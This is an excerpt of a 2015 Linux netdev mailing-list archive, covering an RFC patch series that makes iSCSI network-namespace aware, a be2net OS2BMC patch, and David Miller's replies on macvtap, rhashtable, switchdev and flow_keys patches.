doesn't work at all when using network namespaces.  This is the start of me
looking at what it would take to make that work, and if it makes sense at all.

The first issue is that the kernel side of the iSCSI netlink control protocol
only operates in the initial network namespace.  But beyond that, if we allow
iSCSI to be managed within a namespace we need to decide what that means.  I
think it makes the most sense to isolate the iSCSI host, along with its
associated endpoints, connections, and sessions, to a network namespace and
allow multiple instances of the userspace tools to exist in separate namespaces
managing separate hosts.

It works well for iscsi_tcp, which creates a host per session.  There's no
attempt to manage sessions on offloading hosts independently, although future
work could include the ability to move an entire host to a new namespace like
is supported for network devices.

This is only about the structures and functionality involved in maintaining the
iSCSI session; the SCSI host along with its discovered targets and devices has
no association with network namespaces.

These patches are functional, but not complete.  There's no isolation enforced
in the kernel just yet, so it relies on well behaved userspace.  I plan on
fixing that, but wanted some feedback on the idea and approach so far.

Thanks,
Chris

Chris Leech (4):
  iscsi: create per-net iscsi nl kernel sockets
  iscsi: sysfs filtering by network namespace
  iscsi: make all netlink multicast namespace aware
  iscsi: set netns for iscsi_tcp hosts

 drivers/scsi/iscsi_tcp.c|   7 +
 drivers/scsi/scsi_transport_iscsi.c | 264 +---
 include/scsi/scsi_transport_iscsi.h |   2 +
 3 files changed, 222 insertions(+), 51 deletions(-)

-- 
2.1.0



[RFC PATCH 4/4] iscsi: set netns for iscsi_tcp hosts

2015-05-13 Thread Chris Leech
This lets iscsi_tcp operate in multiple namespaces.  It uses current
during session creation to find the net namespace, but it might be
better to manage to pass it along from the iscsi netlink socket.
---
 drivers/scsi/iscsi_tcp.c| 7 +++
 drivers/scsi/scsi_transport_iscsi.c | 7 ++-
 include/scsi/scsi_transport_iscsi.h | 1 +
 3 files changed, 14 insertions(+), 1 deletion(-)

diff --git a/drivers/scsi/iscsi_tcp.c b/drivers/scsi/iscsi_tcp.c
index 0b8af18..ebe99da 100644
--- a/drivers/scsi/iscsi_tcp.c
+++ b/drivers/scsi/iscsi_tcp.c
@@ -948,6 +948,11 @@ static int iscsi_sw_tcp_slave_configure(struct scsi_device *sdev)
return 0;
 }
 
+static struct net *iscsi_sw_tcp_netns(struct Scsi_Host *shost)
+{
+	return current->nsproxy->net_ns;
+}
+
 static struct scsi_host_template iscsi_sw_tcp_sht = {
 	.module			= THIS_MODULE,
 	.name			= "iSCSI Initiator over TCP/IP",
@@ -1003,6 +1008,8 @@ static struct iscsi_transport iscsi_sw_tcp_transport = {
 	.alloc_pdu		= iscsi_sw_tcp_pdu_alloc,
 	/* recovery */
 	.session_recovery_timedout = iscsi_session_recovery_timedout,
+	/* net namespace */
+	.get_netns		= iscsi_sw_tcp_netns,
 };
 
 static int __init iscsi_sw_tcp_init(void)
diff --git a/drivers/scsi/scsi_transport_iscsi.c b/drivers/scsi/scsi_transport_iscsi.c
index 4fdd4bf..791aacd 100644
--- a/drivers/scsi/scsi_transport_iscsi.c
+++ b/drivers/scsi/scsi_transport_iscsi.c
@@ -1590,11 +1590,16 @@ static int iscsi_setup_host(struct transport_container *tc, struct device *dev,
 {
 	struct Scsi_Host *shost = dev_to_shost(dev);
 	struct iscsi_cls_host *ihost = shost->shost_data;
+	struct iscsi_internal *priv = to_iscsi_internal(shost->transportt);
+	struct iscsi_transport *transport = priv->iscsi_transport;
 
 	memset(ihost, 0, sizeof(*ihost));
 	atomic_set(&ihost->nr_scans, 0);
 	mutex_init(&ihost->mutex);
-	ihost->netns = &init_net;
+	if (transport->get_netns)
+		ihost->netns = transport->get_netns(shost);
+	else
+		ihost->netns = &init_net;
 
 	iscsi_bsg_host_add(shost, ihost);
 	/* ignore any bsg add error - we just can't do sgio */
diff --git a/include/scsi/scsi_transport_iscsi.h b/include/scsi/scsi_transport_iscsi.h
index 860ac0c..878bcf2 100644
--- a/include/scsi/scsi_transport_iscsi.h
+++ b/include/scsi/scsi_transport_iscsi.h
@@ -168,6 +168,7 @@ struct iscsi_transport {
 	int (*logout_flashnode_sid) (struct iscsi_cls_session *cls_sess);
 	int (*get_host_stats) (struct Scsi_Host *shost, char *buf, int len);
 	u8 (*check_protection)(struct iscsi_task *task, sector_t *sector);
+	struct net *(*get_netns)(struct Scsi_Host *shost);
 };
 
 /*
-- 
2.1.0
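
For readers skimming the patch above, the core idea is an optional
per-transport callback with a fallback to the initial namespace.  The
following is a minimal userspace sketch of that pattern only; the type and
function names (struct host, struct transport, setup_host, tcp_get_netns)
are hypothetical stand-ins, not the kernel structures.

```c
#include <stddef.h>

/* Illustrative stand-ins for kernel types; none of these are real kernel names. */
struct net { int id; };
struct host;

struct transport {
	/* Optional hook: NULL means "fall back to the default namespace". */
	struct net *(*get_netns)(struct host *h);
};

struct host {
	const struct transport *transport;
	struct net *netns;
};

static struct net default_net = { 0 };	/* plays the role of init_net */
static struct net session_net = { 1 };	/* plays the role of the creator's netns */

/* A transport that knows its namespace, like iscsi_tcp in the patch. */
static struct net *tcp_get_netns(struct host *h)
{
	(void)h;
	return &session_net;
}

/* Same shape as the if/else added to iscsi_setup_host(). */
static void setup_host(struct host *h, const struct transport *t)
{
	h->transport = t;
	if (t->get_netns)
		h->netns = t->get_netns(h);
	else
		h->netns = &default_net;
}
```

A transport that leaves get_netns unset keeps today's behaviour, which is
presumably why offloading hosts are unaffected by this patch.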



Re: [PATCH v5] macvtap add missing ioctls

2015-05-13 Thread David Miller
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 12:35:16 +0100

> The macvtap driver tries to emulate all the ioctls supported by a normal
> tun/tap driver, however it was missing the generic SIOCGIFHWADDR and
> SIOCSIFHWADDR ioctls to get and set the mac address that are supported
> by tun/tap. This patch adds these.
>
> Signed-off-by: Justin Cormack jus...@netbsd.org

As I stated, you cannot just send a new version of a patch I already
applied to my tree.

It is in the permanent GIT commit record, and cannot be removed.

Therefore, you must send a relative fix.


Re: netlink rhashtable status

2015-05-13 Thread David Miller
From: Eric Dumazet eric.duma...@gmail.com
Date: Wed, 13 May 2015 09:18:04 -0700

> On Wed, 2015-05-13 at 06:04 -0700, Eric Dumazet wrote:
> > On Wed, 2015-05-13 at 14:20 +0800, Herbert Xu wrote:
> > > On Tue, May 12, 2015 at 11:15:40PM -0700, Eric Dumazet wrote:
> > > >
> > > > Trick is to start about 200 threads using getaddrinfo()
> > >
> > > When it loses the kernel socket, is it permanent or intermittent?
> > >
> > > I'm trying to figure out whether it's the hashtable reader missing
> > > an entry that's there or whether the hashtable has been corrupted
> > > and an entry is gone forever.
> > >
> > > Cheers,
> >
> > This is permanent. We have to reboot the host.
> >
>
> For 4.0.3 I replaced the two rhashtable files by current Linus version,
> and problem is gone, so the fix is not in net/netlink
>
>  include/linux/rhashtable.h |   10 
>  lib/rhashtable.c   |  582 ---
>  2 files changed, 215 insertions(+), 377 deletions(-)
>
> I did a bisection but ended up at
>
> 393619474ec0 rhashtable: Fix read-side crash during rehash
>
> And simply backporting it does not solve the problem

Backporting all of the rhashtable bits is going to be really painful
and potentially quite risky.  However, if someone is confident enough,
I'm willing to entertain this idea.

Alternatively, we could consider reverting the rhashtable conversion
of netlink in the interim.  It might be the safest solution for
-stable.



Re: [PATCH v4] macvtap add missing ioctls - fix wrapping

2015-05-13 Thread David Miller
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 11:06:01 +0100

> On Tue, 2015-05-12 at 23:01 -0400, David Miller wrote:
> > From: Justin Cormack jus...@myriabit.com
> > Date: Mon, 11 May 2015 20:00:10 +0100
> >
> > > The macvtap driver tries to emulate all the ioctls supported by a normal
> > > tun/tap driver, however it was missing the generic SIOCGIFHWADDR and
> > > SIOCSIFHWADDR ioctls to get and set the mac address that are supported
> > > by tun/tap. This patch adds these.
> > >
> > > Signed-off-by: Justin Cormack jus...@netbsd.org
> >
> > Applied to net-next, thanks.
> >
>
> The kbuild test picked up a stupid error, should I send a new patch
> version, or a patch against net-next?

Patches are never removable from my tree, so you must always send relative
fixes.


Re: [PATCH net-next] rename RTNH_F_EXTERNAL to RTNH_F_OFFLOAD

2015-05-13 Thread David Miller
From: roopa ro...@cumulusnetworks.com
Date: Wed, 13 May 2015 06:38:02 -0700

 On 5/13/15, 1:26 AM, Daniel Borkmann wrote:
 On 05/13/2015 07:42 AM, Jiri Pirko wrote:
 Wed, May 13, 2015 at 07:27:10AM CEST, ro...@cumulusnetworks.com wrote:
 From: Roopa Prabhu ro...@cumulusnetworks.com

 RTNH_F_EXTERNAL today is printed as offload in iproute2 output.

 This patch renames the flag to be consistent with what the user sees.

 (I will post iproute2 patch if this gets accepted)

 Signed-off-by: Roopa Prabhu ro...@cumulusnetworks.com
 ---
 include/uapi/linux/rtnetlink.h |    2 +-
 net/ipv4/fib_trie.c            |    2 +-
 net/switchdev/switchdev.c      |    6 +++---
 3 files changed, 5 insertions(+), 5 deletions(-)

 diff --git a/include/uapi/linux/rtnetlink.h
 b/include/uapi/linux/rtnetlink.h
 index 974db03..17fb02f 100644
 --- a/include/uapi/linux/rtnetlink.h
 +++ b/include/uapi/linux/rtnetlink.h
 @@ -337,7 +337,7 @@ struct rtnexthop {
 #define RTNH_F_DEAD		1	/* Nexthop is dead (used by multipath)	*/
 #define RTNH_F_PERVASIVE	2	/* Do recursive gateway lookup	*/
 #define RTNH_F_ONLINK		4	/* Gateway is forced on link	*/
 -#define RTNH_F_EXTERNAL	8	/* Route installed externally	*/
 +#define RTNH_F_OFFLOAD		8	/* offloaded route */

 Since this is part of uapi, I believe this is not doable :/
 i thought it was not too late :) and besides i wasn't changing the
 value and just the name.
 current iproute2 would still build for example.

If it made it into a release kernel, you cannot change it.

Period.


Re: [PATCH net-next 0/4] switchdev: more (minor) cleanups

2015-05-13 Thread David Miller
From: sfel...@gmail.com
Date: Tue, 12 May 2015 23:03:50 -0700

> Fix some sparse warnings and include some documentation review comments that
> didn't get picked up in the switchdev Spring Cleanup series.

Series applied, thanks Scott.


Re: [PATCH net-next] switchdev: don't use anonymous union on switchdev attr/obj structs

2015-05-13 Thread David Miller
From: sfel...@gmail.com
Date: Wed, 13 May 2015 11:16:50 -0700

> From: Scott Feldman sfel...@gmail.com
>
> Older gcc versions (e.g. gcc version 4.4.6) don't like anonymous unions,
> which was causing build issues on the newly added switchdev attr/obj
> structs.  Fix this by using a named union on the structs.
>
> Signed-off-by: Scott Feldman sfel...@gmail.com
> Reported-by: Or Gerlitz ogerl...@mellanox.com

Applied, thanks.
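
As a rough illustration of the change described above, here is what a
named union looks like in a struct.  This is only a sketch: struct
port_attr and its members are hypothetical, not the actual switchdev
definitions, and the remark about initializers is an assumption about
where older compilers tend to trip rather than something the patch states.

```c
/* Hypothetical struct for illustration; not the switchdev attr/obj layout. */
struct port_attr {
	int id;
	union {
		unsigned char stp_state;
		unsigned long brport_flags;
	} u;	/* named member: every access goes through .u */
};

/*
 * With a named union the designated initializer spells out the path
 * (.u.stp_state).  Assumption: initializing members of an *anonymous*
 * union this way is the kind of construct older gcc releases reject.
 */
static const struct port_attr example_attr = {
	.id = 1,
	.u.stp_state = 3,
};

/* Accessor showing the extra ".u" hop callers need after the change. */
static unsigned char port_attr_stp_state(const struct port_attr *attr)
{
	return attr->u.stp_state;
}
```

The cost is the extra ".u" at each use site; the benefit is that the code
no longer depends on anonymous-union support in the compiler.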


Re: [PATCH net-next] fix missing copy_from_user in macvtap

2015-05-13 Thread David Miller
From: Justin Cormack jus...@myriabit.com
Date: Wed, 13 May 2015 19:19:02 +0100

> Fix missing copy_from_user in macvtap SIOCSIFHWADDR ioctl.
>
> Signed-off-by: Justin Cormack jus...@netbsd.org

Applied.


Re: [PATCH 4/4] netconsole: implement extended console support

2015-05-13 Thread David Miller
From: Tejun Heo t...@kernel.org
Date: Wed, 13 May 2015 11:46:20 -0400

> Hello, David.
>
> On Tue, May 12, 2015 at 07:23:22PM -0400, David Miller wrote:
> > Second question, is there an upper bound on this header size?
> > Because if there is, it seems to me that there is no reason why we
> > can't just avoid the fragmentation support altogether.
> >
> > The current code limits to 1000 bytes, and that limit seems arbitrary.
> > Obviously this code is meant to work on interfaces with an ethernet
> > MTU or larger.  So you could bump the limit enough to accommodate the
> > new header size, yet still be within the real constraints.
> >
> > What do you think?
>
> Yeah, if we can bump the tx size enough to accommodate all messages,
> it'd be great.  It can get fairly large tho.  The absolute maximum
> right now is 8k.  While regular printk message bodies are capped
> slightly below 1k, the dictionary printed through vprintk_emit()
> doesn't have such a length limit.  Another factor is that non-printables
> are escaped using \xXX and vprintk_emit() is supposed to be useable
> with transmitting binary data (like low level device error
> descriptors) although I'm not sure anybody is doing that yet.

Yeah, 8K is too much to handle, oh well.

Ok I'm fine with this series from my end, and you can merge this
wherever the extended console support bits go.

Signed-off-by: David S. Miller da...@davemloft.net

Thanks.
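
To make the size argument above concrete: with \xXX escaping, each
non-printable byte becomes four output bytes, so binary payloads can grow
up to fourfold.  Below is a small userspace sketch of such an escaper.  It
is an illustration under assumptions (the function name is made up, and
escaping the backslash itself is a choice made here), not the kernel's
implementation.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

/*
 * Copy src into dst, replacing non-printable bytes (and '\\', an assumption
 * made here so the output stays unambiguous) with a 4-character \xXX escape.
 * Returns the number of bytes written, excluding the trailing NUL, or -1 if
 * dst is too small.
 */
static int escape_nonprintable(const unsigned char *src, size_t len,
			       char *dst, size_t dst_size)
{
	size_t out = 0;
	size_t i;

	if (dst_size == 0)
		return -1;

	for (i = 0; i < len; i++) {
		if (isprint(src[i]) && src[i] != '\\') {
			if (out + 1 >= dst_size)	/* keep room for NUL */
				return -1;
			dst[out++] = (char)src[i];
		} else {
			if (out + 4 >= dst_size)	/* 4 chars plus NUL */
				return -1;
			snprintf(dst + out, 5, "\\x%02x", src[i]);
			out += 4;
		}
	}
	dst[out] = '\0';
	return (int)out;
}
```

Three input bytes with one control character in the middle already need
six output bytes, which is why a fixed 1000-byte limit is hard to guarantee
once binary dictionaries are allowed.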


[PATCH net-next 3/3] be2net: Support for OS2BMC.

2015-05-13 Thread Venkat Duvvuru
The OS2BMC feature allows the server to communicate with the on-board
BMC/iDRAC (Baseboard Management Controller) over the LOM via
standard Ethernet.

When the OS2BMC feature is enabled, the LOM filters traffic coming
from the host. If the destination MAC address matches the iDRAC MAC
address, it forwards the packet to the NC-SI side-band interface
for iDRAC processing. Otherwise, it sends the packet out on the wire to
the external network. Broadcast and multicast packets are sent on the
side-band NC-SI channel and on the wire as well. Some of the packet
filters are not supported in the NIC, so the driver identifies
such packets and hints the NIC to send them to the BMC.
This is done by duplicating packets on the management ring. Packets
are sent to the management ring by setting the mgmt bit in the WRB header.
The NIC forwards the packets on the management ring to the BMC
through the side-band NC-SI channel.

Please refer to this online document for more details,
http://www.dell.com/downloads/global/products/pedge/
os_to_bmc_passthrough_a_new_chapter_in_system_management.pdf
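
The forwarding rule described above can be sketched as a small decision
function.  This is a simplified userspace model of the description only;
the names (os2bmc_route, FWD_WIRE, FWD_BMC) are hypothetical and it does
not model the driver-side filter mask or the management ring.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define ETH_ALEN 6

/* Where a host-originated frame should go; values can be OR-ed together. */
enum fwd_target {
	FWD_WIRE = 1 << 0,	/* external network */
	FWD_BMC  = 1 << 1,	/* NC-SI side-band channel to the BMC */
};

/* The group bit is set for both multicast and broadcast addresses. */
static bool is_group_addr(const uint8_t *mac)
{
	return (mac[0] & 0x01) != 0;
}

/* Decide the destination(s) for a frame, following the description above. */
static unsigned int os2bmc_route(const uint8_t *dst, const uint8_t *bmc_mac)
{
	if (is_group_addr(dst))
		return FWD_WIRE | FWD_BMC;	/* broadcast/multicast: both */
	if (memcmp(dst, bmc_mac, ETH_ALEN) == 0)
		return FWD_BMC;			/* unicast to the BMC */
	return FWD_WIRE;			/* everything else */
}
```

In the patch itself this classification is split between NIC filters and
the driver, which marks the frames the NIC cannot classify on its own.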

Signed-off-by: Venkat Duvvuru venkatkumar.duvv...@emulex.com
---
 drivers/net/ethernet/emulex/benet/be.h  |8 ++-
 drivers/net/ethernet/emulex/benet/be_cmds.c |   19 
 drivers/net/ethernet/emulex/benet/be_cmds.h |   17 
 drivers/net/ethernet/emulex/benet/be_main.c |  138 +++
 4 files changed, 181 insertions(+), 1 deletions(-)

diff --git a/drivers/net/ethernet/emulex/benet/be.h b/drivers/net/ethernet/emulex/benet/be.h
index 63922d4..8d12b41 100644
--- a/drivers/net/ethernet/emulex/benet/be.h
+++ b/drivers/net/ethernet/emulex/benet/be.h
@@ -384,6 +384,7 @@ enum vf_state {
 #define BE_FLAGS_SETUP_DONE			BIT(9)
 #define BE_FLAGS_EVT_INCOMPATIBLE_SFP		BIT(10)
 #define BE_FLAGS_ERR_DETECTION_SCHEDULED	BIT(11)
+#define BE_FLAGS_OS2BMC				BIT(12)
 
 #define BE_UC_PMAC_COUNT			30
 #define BE_VF_UC_PMAC_COUNT			2
@@ -428,6 +429,8 @@ struct be_resources {
 	u32 vf_if_cap_flags;	/* VF if capability flags */
 };
 
+#define be_is_os2bmc_enabled(adapter) (adapter->flags & BE_FLAGS_OS2BMC)
+
 struct rss_info {
u64 rss_flags;
u8 rsstable[RSS_INDIR_TABLE_LEN];
@@ -461,7 +464,8 @@ enum {
 	BE_WRB_F_LSO_BIT,		/* LSO */
 	BE_WRB_F_LSO6_BIT,		/* LSO6 */
 	BE_WRB_F_VLAN_BIT,		/* VLAN */
-	BE_WRB_F_VLAN_SKIP_HW_BIT	/* Skip VLAN tag (workaround) */
+	BE_WRB_F_VLAN_SKIP_HW_BIT,	/* Skip VLAN tag (workaround) */
+	BE_WRB_F_OS2BMC_BIT		/* Send packet to the management ring */
 };
 
 /* The structure below provides a HW-agnostic abstraction of WRB params
@@ -584,6 +588,8 @@ struct be_adapter {
 	struct be_hwmon hwmon_info;
 	u8 pf_number;
 	struct rss_info rss_info;
+	/* Filters for packets that need to be sent to BMC */
+	u32 bmc_filt_mask;
 };
 
 #define be_physfn(adapter)	(!adapter->virtfn)
diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.c b/drivers/net/ethernet/emulex/benet/be_cmds.c
index dce8786..4115054 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.c
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.c
@@ -333,6 +333,21 @@ static void be_async_grp5_pvid_state_process(struct be_adapter *adapter,
 	}
 }
 
+#define MGMT_ENABLE_MASK	0x4
+static void be_async_grp5_fw_control_process(struct be_adapter *adapter,
+					     struct be_mcc_compl *compl)
+{
+	struct be_async_fw_control *evt = (struct be_async_fw_control *)compl;
+	u32 evt_dw1 = le32_to_cpu(evt->event_data_word1);
+
+	if (evt_dw1 & MGMT_ENABLE_MASK) {
+		adapter->flags |= BE_FLAGS_OS2BMC;
+		adapter->bmc_filt_mask = le32_to_cpu(evt->event_data_word2);
+	} else {
+		adapter->flags &= ~BE_FLAGS_OS2BMC;
+	}
+}
+
 static void be_async_grp5_evt_process(struct be_adapter *adapter,
 				      struct be_mcc_compl *compl)
 {
@@ -349,6 +364,10 @@ static void be_async_grp5_evt_process(struct be_adapter *adapter,
 	case ASYNC_EVENT_PVID_STATE:
 		be_async_grp5_pvid_state_process(adapter, compl);
 		break;
+	/* Async event to disable/enable os2bmc and/or mac-learning */
+	case ASYNC_EVENT_FW_CONTROL:
+		be_async_grp5_fw_control_process(adapter, compl);
+		break;
 	default:
 		break;
 	}
diff --git a/drivers/net/ethernet/emulex/benet/be_cmds.h b/drivers/net/ethernet/emulex/benet/be_cmds.h
index c713d51..2716e6f 100644
--- a/drivers/net/ethernet/emulex/benet/be_cmds.h
+++ b/drivers/net/ethernet/emulex/benet/be_cmds.h
@@ -105,6 +105,7 @@ struct be_mcc_compl {
 #define ASYNC_DEBUG_EVENT_TYPE_QNQ	1
 #define ASYNC_EVENT_CODE_SLIPORT	0x11
 #define 

Re: [PATCH v3 net-next 1/5] net: Get skb hash over flow_keys structure

2015-05-13 Thread David Miller
From: Tom Herbert t...@herbertland.com
Date: Wed, 13 May 2015 15:37:50 -0400

> On Wed, May 13, 2015 at 3:30 PM, David Miller da...@davemloft.net wrote:
> > From: Tom Herbert t...@herbertland.com
> > Date: Tue, 12 May 2015 08:22:58 -0700
> >
> > > @@ -15,6 +15,13 @@
> > >   * All the members, except thoff, are in network byte order.
> > >   */
> > >  struct flow_keys {
> > > +	u16 thoff;
> > > +	u16 padding1;
> > > +#define FLOW_KEYS_HASH_START_FIELD	n_proto
> > > +	__be16	n_proto;
> > > +	u8	ip_proto;
> > > +	u8	padding;
> > > +
> >
> > This padding works if everyone consistently zero initializes the whole
> > key structure, but for whatever reason (performance, unintentional
> > oversight, etc.) not all paths do.
> >
> > So, for example, inet_set_txhash() is going to have random crap in
> > keys.padding, so the hashes computed are not stable for a given flow
> > key tuple.
> >
> > That's just the first code path I found with this issue, there are
> > probably several others.
>
> memset zero is in the second patch for inet_set_txhash and
> ip6_set_txhash. I can respin so those are in the first patch.

Yes, for bisectability you should probably do that.
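
The padding concern above is easy to reproduce outside the kernel.  The
sketch below hashes a struct from a start field to its end, the way the
quoted FLOW_KEYS_HASH_START_FIELD macro suggests, and shows why the
structure must be zeroed first.  Everything here is an assumption for
illustration: struct keys is a cut-down stand-in for struct flow_keys, and
FNV-1a stands in for whatever hash the kernel actually uses.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Simplified stand-in for struct flow_keys; not the kernel layout. */
struct keys {
	uint16_t thoff;
	uint16_t padding1;
	uint16_t n_proto;	/* hashing starts at this field */
	uint8_t  ip_proto;
	uint8_t  padding;	/* explicit padding, included in the hash */
	uint32_t src;
	uint32_t dst;
};

/* FNV-1a over the bytes from n_proto to the end of the struct. */
static uint32_t keys_hash(const struct keys *k)
{
	const uint8_t *p = (const uint8_t *)k + offsetof(struct keys, n_proto);
	size_t len = sizeof(*k) - offsetof(struct keys, n_proto);
	uint32_t h = 2166136261u;
	size_t i;

	for (i = 0; i < len; i++) {
		h ^= p[i];
		h *= 16777619u;
	}
	return h;
}

/* Zero the whole struct first so padding bytes never carry stale data. */
static void keys_init(struct keys *k, uint16_t n_proto, uint8_t ip_proto,
		      uint32_t src, uint32_t dst)
{
	memset(k, 0, sizeof(*k));
	k->n_proto = n_proto;
	k->ip_proto = ip_proto;
	k->src = src;
	k->dst = dst;
}
```

Two keys built through keys_init() with the same tuple always hash alike;
skip the memset and a stray byte in padding is enough to change the result
for an otherwise identical flow.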


Re: [patch net-next v3 00/15] introduce programable flow dissector and cls_flower

2015-05-13 Thread David Miller
From: Tom Herbert t...@herbertland.com
Date: Wed, 13 May 2015 15:27:59 -0400

> > I'm sure there will be some performance improvements possible, and I
> > hope you will look into making sure this new programmable classifier
> > is as light weight as possible.
> ...
>
> I still have concerns about making flow_dissector more complex like
> this. It still seems like this programmable logic should be done
> in a separate function. We call flow_dissector at least once per
> packet via skb_get_hash, it is in the critical path, and adding
> several conditionals can only slow it down and provides no new value
> to skb_get_hash. At the very least, can we get some
> performance numbers to show the impact of this?

The part of what I said to Jiri above is meant exactly to ensure that
he handles this.

If we need a specialized fast path for the skb_get_hash() code paths,
so be it.

But I'm not going to denounce his entire efforts for something that
hasn't even been shown to be an issue yet.  And if it is, I'm sure
Jiri will work to address it.